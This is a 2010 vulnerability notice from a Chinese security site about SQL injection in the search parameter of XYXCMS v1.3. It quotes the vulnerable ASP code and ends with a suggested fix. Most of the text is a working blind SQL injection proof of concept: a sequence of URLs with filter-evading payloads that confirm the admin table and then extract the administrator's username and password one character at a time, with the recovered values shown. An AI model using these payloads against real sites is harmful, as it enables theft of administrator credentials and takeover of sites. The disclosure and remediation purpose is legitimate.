XYXCMS v1.3 search injection vulnerability - vulnerability warning - Hack58 Security Net (黑吧安全网)

2010-06-22T00:00:00
ID MYHACK58:62201027320
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-06-22T00:00:00

Description

The search page (s.asp) does not filter its input strictly, which results in a string-type SQL injection through the search string. The following code from s.asp shows the problem: the search parameter k is read and used as-is, while the page parameter is validated with IsNumeric and cast with CInt, so only k is exploitable:

    k=request.QueryString("k")
    page=request.QueryString("page")
    if page="" or isnumeric(page)=0 then
        g_cur_page=1
    else
        g_cur_page=cint(page)
    end if

Proof of concept. Each payload closes the LIKE pattern that the search term is evidently inserted into, appends a boolean condition, and reopens the pattern so that the page's own trailing %' completes the statement; the search returns results only when the condition is true. The mixed-case keywords are a keyword-filter evasion and make no difference to the database. The functions used (Asc, Mid, Len) and the TOP-based row selection further down indicate a Microsoft Access (Jet) backend. The boolean operator must be written as AnD: a bare & in the query string would be parsed as a parameter separator.

http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'='
    confirms that a table named admin exists
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'='
    the admin table holds exactly one row (one administrator)
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'='
    the administrator username is 4 characters long
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'='
    the administrator password is 8 characters long

Username (length 4). Each request tests the ASCII code of one character. The nested SeLEcT ToP 1 * ... OrDEr By 1 / OrDEr By 1 dEsC subquery is the Access idiom for selecting a specific row, since Jet SQL has no LIMIT/OFFSET; with a single admin row it simply returns that row.

http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'='
    first character of the username: 109 = m
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'='
    second character: 97 = a
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'='
    third character: 114 = r
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'='
    fourth character: 115 = s

So the username is mars: the ASC values 109, 97, 114 and 115 queried above decode to m, a, r and s (the letters q, i, n, g that accompany these payloads in the original annotations do not match the values actually tested).

Password (length 8):

http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'='
    first character of the password: 49 = 1
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'='
    second character: 50 = 2
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'='
    third character: 51 = 3
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'='
    fourth character: 52 = 4
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='
    fifth character: 113 = q
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='
    sixth character: 119 = w
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='
    seventh character: 113 = q
http://www.hack58.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='
    eighth character: 119 = w

So the password is 1234qwqw

Fix: for this string-context injection it is enough to reject a single quote in k before it reaches the query. Rejecting the quote outright is crude (a legitimate search containing an apostrophe is refused, and it gives no protection to any parameter used in a numeric context); escaping the quote by doubling it, or better, binding k as a parameter of an ADO command, is the robust fix. The page parameter is already safe because it is checked with IsNumeric and cast with CInt, though CInt raises an overflow error for values above 32767.

    k=request.QueryString("k")
    if instr(k,"'")>0 then
        response.Write "<script>alert('error');window.close();</script>"
        response.End()
    end if
    page=request.QueryString("page")
    if page="" or isnumeric(page)=0 then
        g_cur_page=1
    else
        g_cur_page=cint(page)
    end if

Author: mars